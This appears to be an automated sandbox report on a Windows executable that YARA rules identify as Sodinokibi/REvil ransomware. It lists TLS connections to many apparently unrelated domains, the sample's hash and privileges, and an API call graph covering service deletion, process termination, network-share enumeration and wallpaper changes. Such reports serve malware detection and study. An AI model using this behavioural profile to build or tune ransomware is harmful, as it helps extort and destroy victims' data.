                                                                                                                                                          Feb 16, 2021 04:31:54.757328987 CET198.12.145.239443192.168.2.349769CN=stacyloeb.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USMon Aug 31 14:31:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Tue Sep 01 02:00:00 CEST 2009Wed Dec 29 17:44:00 CET 2021 Sat May 03 09:00:00 CEST 2031 Fri Jan 01 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue Sep 01 02:00:00 CEST 2009Fri Jan 01 00:59:59 CET 2038
                                                                                                                                                          Feb 16, 2021 04:31:57.965348959 CET144.76.225.204443192.168.2.349770CN=mediaacademy-iraq.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 24 00:16:34 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 24 00:16:34 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:58.446204901 CET52.29.252.113443192.168.2.349771CN=gemeentehetkompas.nl CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Jan 09 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Sat Apr 10 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:59.854739904 CET178.250.15.192443192.168.2.349772CN=daklesa.de CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue May 05 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Mon May 23 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:32:00.257339954 CET155.133.142.13443192.168.2.349773CN=pierrehale.com CN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FRCN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FR CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Sep 17 02:00:00 CEST 2020 Fri Sep 12 02:00:00 CEST 2014Sun Oct 17 01:59:59 CEST 2021 Thu Sep 12 01:59:59 CEST 2024771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FRCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Sep 12 02:00:00 CEST 2014Thu Sep 12 01:59:59 CEST 2024
                                                                                                                                                          Feb 16, 2021 04:32:01.208339930 CET104.21.9.188443192.168.2.349774CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Jul 29 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Jul 29 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:01.617275000 CET104.26.13.9443192.168.2.349775CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jul 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sat Jul 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:02.616962910 CET142.93.110.250443192.168.2.349776CN=thewellnessmimi.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 06 09:15:01 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 06 10:15:01 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:03.170119047 CET46.30.215.215443192.168.2.349777CN=*.huehnerauge-entfernen.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 05 00:49:53 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 06 01:49:53 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:05.679265976 CET172.67.222.33443192.168.2.349778CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jul 07 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Jul 07 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:06.849010944 CET116.90.53.15443192.168.2.349779CN=cosmeticsbysia.com.au CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 29 22:40:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 29 23:40:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:08.127417088 CET116.90.53.15443192.168.2.349780CN=www.youbysia.you-bysia.com.au CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 03 19:19:29 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 03 20:19:29 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:10.456650019 CET85.119.82.125443192.168.2.349781CN=www.kmbshipping.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Dec 25 06:00:09 CET 2020 Wed Oct 07 21:21:40 CEST 2020Thu Mar 25 06:00:09 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:10.833622932 CET85.119.82.125443192.168.2.349782CN=www.kmbshipping.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Dec 25 06:00:09 CET 2020 Wed Oct 07 21:21:40 CEST 2020Thu Mar 25 06:00:09 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:11.213845015 CET91.121.58.131443192.168.2.349783CN=idemblogs.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 17 11:46:09 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 17 12:46:09 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:04:29:26
Start date:16/02/2021
Path:C:\Users\user\Desktop\tS9P6wPz9x.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\tS9P6wPz9x.exe'
Imagebase:0x9c0000
File size:120832 bytes
MD5 hash:39D22B8F3DA4A83CD957F324F2423309
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204328055.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204654521.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204504022.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
• Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204445658.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
Reputation:low

General

Start time:04:30:42
Start date:16/02/2021
Path:C:\Windows\System32\wbem\unsecapp.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\unsecapp.exe -Embedding
Imagebase:0x7ff718cf0000
File size:48640 bytes
MD5 hash:9CBD3EC8D9E4F8CE54258B0573C66BEB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis

Execution Graph

Execution Coverage:28.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:11.8%
Total number of Nodes:1140
Total number of Limit Nodes:11

Graph

5146->5122 5148 9c5a58 5148->5146 5149 9c5a60 OpenSCManagerW 5148->5149 5157 9c5a83 5149->5157 5150 9c5bad CloseServiceHandle 5150->5146 5152 9c5af8 OpenServiceW 5152->5150 5153 9c5b1a ControlService 5152->5153 5154 9c5b38 DeleteService 5153->5154 5153->5157 5154->5150 5155 9c5b43 CloseServiceHandle 5154->5155 5155->5157 5157->5146 5157->5150 5157->5152 5159 9c5b6b OpenProcess 5157->5159 5172 9c4964 5157->5172 5181 9c4917 OpenProcess 5157->5181 5159->5157 5160 9c5b7c TerminateProcess 5159->5160 5161 9c4b21 FindCloseChangeNotification 5160->5161 5161->5157 5162->5122 5164 9c6776 9 API calls 5163->5164 5165 9c30e8 5164->5165 5166 9c6a11 9 API calls 5165->5166 5167 9c3138 5166->5167 5167->5119 5168->5145 5185 9c4832 5169->5185 5173 9c497a 5172->5173 5175 9c497f 5172->5175 5174 9c47ab 3 API calls 5173->5174 5174->5175 5176 9c4992 OpenProcess 5175->5176 5177 9c49a9 QueryFullProcessImageNameW 5176->5177 5180 9c49dc 5176->5180 5178 9c4b21 FindCloseChangeNotification 5177->5178 5179 9c49c2 PathFindFileNameW 5178->5179 5179->5180 5180->5157 5182 9c495f 5181->5182 5183 9c4936 GetExitCodeProcess Sleep 5181->5183 5182->5157 5183->5183 5184 9c4955 CloseHandle 5183->5184 5184->5182 5186 9c483c VerSetConditionMask VerifyVersionInfoW 5185->5186 5186->5148 5187->4916 5188->4916 5189->4912 5190->4919 5192 9c47ab 3 API calls 5191->5192 5194 9c7b8f 5192->5194 5193 9c7c56 5194->5193 5195 9c509b 7 API calls 5194->5195 5202 9c7bcb 5195->5202 5196 9c7c17 5198 9c47f8 RtlFreeHeap 5196->5198 5197 9c7bd2 GetDriveTypeW 5197->5202 5199 9c7c1c 5198->5199 5212 9c7a1f WNetOpenEnumW 5199->5212 5200 9c761a 55 API calls 5200->5202 5202->5196 5202->5197 5202->5200 5204 9c7a1f 59 API calls 5205 9c7c2e 5204->5205 5206 9c7a1f 59 API calls 5205->5206 5207 9c7c37 5206->5207 5208 9c7a1f 59 API calls 5207->5208 5209 9c7c40 5208->5209 5210 9c7a1f 59 API calls 5209->5210 5211 9c7c49 RevertToSelf 5210->5211 5211->5193 5213 9c7a3f 5212->5213 5214 9c7a46 5212->5214 5213->5204 5215 9c47ab 3 API calls 5214->5215 
5216 9c7a59 5215->5216 5217 9c7a70 5216->5217 5218 9c7a60 WNetCloseEnum 5216->5218 5219 9c7a71 WNetEnumResourceW 5217->5219 5220 9c7b62 5217->5220 5223 9c7a1f 55 API calls 5217->5223 5224 9c47ab 3 API calls 5217->5224 5225 9c761a 55 API calls 5217->5225 5226 9c47f8 RtlFreeHeap 5217->5226 5218->5213 5219->5217 5221 9c47f8 RtlFreeHeap 5220->5221 5222 9c7b68 WNetCloseEnum 5221->5222 5222->5213 5223->5217 5224->5217 5225->5217 5226->5217 5228 9c544b 9 API calls 5227->5228 5229 9c4449 5228->5229 5230 9c47ab 3 API calls 5229->5230 5244 9c44ea 5229->5244 5231 9c4463 5230->5231 5232 9c44af 5231->5232 5233 9c544b 9 API calls 5231->5233 5231->5244 5261 9c5753 GetTempPathW 5232->5261 5233->5231 5235 9c44de 5236 9c44e4 5235->5236 5238 9c44ec 5235->5238 5237 9c47f8 RtlFreeHeap 5236->5237 5237->5244 5239 9c47ab 3 API calls 5238->5239 5240 9c4509 5239->5240 5241 9c47f8 RtlFreeHeap 5240->5241 5240->5244 5242 9c4518 5241->5242 5243 9c47f8 RtlFreeHeap 5242->5243 5243->5244 5244->4846 5246 9c4422 SystemParametersInfoW 5245->5246 5247 9c42a4 LocalAlloc 5245->5247 5246->4852 5249 9c432b GlobalAlloc 5247->5249 5250 9c4324 5247->5250 5249->5246 5251 9c4361 GetDIBits 5249->5251 5250->5249 5251->5246 5252 9c437e CreateFileW 5251->5252 5252->5246 5253 9c43a1 WriteFile 5252->5253 5254 9c4404 5253->5254 5255 9c43e7 WriteFile 5253->5255 5258 9c4b21 FindCloseChangeNotification 5254->5258 5255->5254 5256 9c4407 WriteFile 5255->5256 5256->5254 5257 9c4425 5256->5257 5259 9c4b21 FindCloseChangeNotification 5257->5259 5258->5246 5260 9c442a GlobalFree 5259->5260 5260->5246 5262 9c5764 5261->5262 5263 9c5766 5261->5263 5262->5235 5264 9c47ab 3 API calls 5263->5264 5265 9c5770 5264->5265 5266 9c5789 5265->5266 5267 9c5777 GetTempPathW 5265->5267 5266->5235 5267->5266 5268 9c5783 5267->5268 5269 9c47f8 RtlFreeHeap 5268->5269 5269->5266 5271 9c6468 5270->5271 5272 9c6422 5270->5272 5284 9c4795 RtlFreeHeap 5271->5284 5272->5271 5277 9c47f8 RtlFreeHeap 5272->5277 5283 9c4795 RtlFreeHeap 5272->5283 5274 
9c6473 5285 9c4787 HeapDestroy 5274->5285 5276 9c647a 5276->4858 5277->5272 5280 9c144d 5279->5280 5282 9c1f64 5279->5282 5280->4863 5281 9c47f8 RtlFreeHeap 5281->5282 5282->5280 5282->5281 5283->5272 5284->5274 5285->5276 5287 9c2931 5286->5287 5292 9c2935 5287->5292 5311 9c5262 GetNativeSystemInfo 5287->5311 5289 9c2967 5290 9c2974 VariantInit 5289->5290 5293 9c29a2 5289->5293 5291 9c299c VariantClear 5290->5291 5291->5293 5293->5292 5294 9c29db SysAllocString 5293->5294 5295 9c2a08 5294->5295 5295->5292 5296 9c2a62 SysAllocString SysAllocString 5295->5296 5298 9c2a92 5296->5298 5297 9c2b5b VariantClear 5297->5298 5298->5292 5298->5297 5299 9c2afb wsprintfW 5298->5299 5300 9c2b4c VariantClear 5298->5300 5299->5300 5301 9c2b1f SysAllocString 5299->5301 5300->5298 5301->5298 5303 9c399d 5302->5303 5304 9c3a03 SysAllocString 5303->5304 5310 9c39a1 5303->5310 5305 9c3a2c SysFreeString 5304->5305 5306 9c3a4f 5305->5306 5305->5310 5307 9c3ad5 SysAllocString SysAllocString 5306->5307 5308 9c3b0d SysFreeString SysFreeString 5307->5308 5309 9c3b26 GetCurrentProcess WaitForSingleObject 5308->5309 5308->5310 5309->5310 5311->5289 5313 9c48f9 GetKeyboardLayoutList 5312->5313 5313->4285 5313->4286 5323 9c1194 5324 9c5c8c 6 API calls 5323->5324 5325 9c11a3 5324->5325 5326 9c5cde 6 API calls 5325->5326 5330 9c11ca 5325->5330 5327 9c11bb 5326->5327 5328 9c47f8 RtlFreeHeap 5327->5328 5329 9c11c3 5328->5329 5329->5330 5331 9c47f8 RtlFreeHeap 5329->5331 5331->5330 5332 9c2c56 5333 9c2c67 5332->5333 5334 9c2c76 5333->5334 5335 9c41bb 3 API calls 5333->5335 5335->5334 5336 9c1091 5337 9c5c8c 6 API calls 5336->5337 5338 9c109f 5337->5338 5339 9c6f12 5342 9c7002 5339->5342 5345 9c4fb9 GetPEB 5342->5345 5344 9c6f1c 5345->5344 5346 9c520e 5347 9c5de2 5346->5347 5348 9c522d CreateMutexW 5347->5348 5349 9c524d RtlGetLastWin32Error 5348->5349 5350 9c525a 5348->5350 5349->5350 5351 9c6f8f 5352 9c7002 GetPEB 5351->5352 5353 9c6f99 5352->5353 4032 9c6d2b 4033 9c6d37 4032->4033 4035 9c6d54 
4033->4035 4048 9c707d 4033->4048 4063 9c6f9b 4035->4063 4038 9c6f9b 13 API calls 4039 9c6e01 GetProcAddress 4038->4039 4040 9c6f9b 13 API calls 4039->4040 4041 9c6e16 GetProcAddress 4040->4041 4042 9c6f9b 13 API calls 4041->4042 4043 9c6e2b GetProcAddress 4042->4043 4044 9c6f9b 13 API calls 4043->4044 4045 9c6e40 GetProcAddress 4044->4045 4046 9c6f9b 13 API calls 4045->4046 4047 9c6e55 GetProcAddress 4046->4047 4049 9c70a3 4048->4049 4057 9c6f9b 13 API calls 4049->4057 4067 9c721d 4049->4067 4071 9c7301 4049->4071 4075 9c6ea0 4049->4075 4079 9c6e67 4049->4079 4083 9c728f 4049->4083 4087 9c7256 4049->4087 4091 9c733a 4049->4091 4095 9c6f56 4049->4095 4099 9c6f1e 4049->4099 4050 9c71cb 4050->4033 4051 9c7170 4051->4050 4103 9c6c30 4051->4103 4057->4051 4064 9c6fb5 4063->4064 4117 9c7373 4064->4117 4066 9c6dec GetProcAddress 4066->4038 4068 9c723a 4067->4068 4069 9c707d 12 API calls 4068->4069 4070 9c724f LoadLibraryA 4069->4070 4070->4051 4072 9c731e 4071->4072 4073 9c707d 12 API calls 4072->4073 4074 9c7333 LoadLibraryA 4073->4074 4074->4051 4076 9c6ebd 4075->4076 4077 9c707d 12 API calls 4076->4077 4078 9c6ed2 LoadLibraryA 4077->4078 4078->4051 4080 9c6e84 4079->4080 4081 9c707d 12 API calls 4080->4081 4082 9c6e99 LoadLibraryA 4081->4082 4082->4051 4084 9c72ac 4083->4084 4085 9c707d 12 API calls 4084->4085 4086 9c72c1 LoadLibraryA 4085->4086 4086->4051 4088 9c7273 4087->4088 4089 9c707d 12 API calls 4088->4089 4090 9c7288 LoadLibraryA 4089->4090 4090->4051 4092 9c7357 4091->4092 4093 9c707d 12 API calls 4092->4093 4094 9c736c LoadLibraryA 4093->4094 4094->4051 4096 9c6f73 4095->4096 4097 9c707d 12 API calls 4096->4097 4098 9c6f88 LoadLibraryA 4097->4098 4098->4051 4100 9c6f3a 4099->4100 4101 9c707d 12 API calls 4100->4101 4102 9c6f4f LoadLibraryA 4101->4102 4102->4051 4104 9c707d 11 API calls 4103->4104 4105 9c6c44 LoadLibraryA 4104->4105 4107 9c6c57 4105->4107 4108 9c6c53 4105->4108 4106 9c6c89 lstrcmpA 4106->4107 4109 9c6cbc 4106->4109 4107->4106 4107->4108 
